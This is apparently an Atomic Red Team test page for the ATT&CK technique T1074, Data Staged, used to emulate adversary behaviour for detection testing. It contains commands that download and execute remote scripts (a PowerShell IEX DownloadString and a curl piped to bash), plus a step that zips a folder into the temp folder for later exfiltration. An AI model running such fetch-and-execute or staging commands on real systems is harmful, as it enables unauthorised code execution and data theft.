T1074.md

T1074 - Data Staged

Description from ATT&CK

Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).

Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

Atomic Tests

• Atomic Test #1 - Stage data from Discovery.bat

• Atomic Test #2 - Stage data from Discovery.sh

• Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp

Atomic Test #1 - Stage data from Discovery.bat

Utilize powershell to download discovery.bat and save to a local file

Supported Platforms: Windows

Attack Commands: Run with powershell!

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log

Atomic Test #2 - Stage data from Discovery.sh

Utilize curl to download discovery.sh and execute a basic information gathering shell script

Supported Platforms: Linux, macOS

Attack Commands: Run with bash!

curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log

Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp

Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.

Supported Platforms: Windows

Attack Commands: Run with powershell!

Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip

Cleanup Commands:

Remove-Item -Path $env:TEMP\Folder_to_zip.zip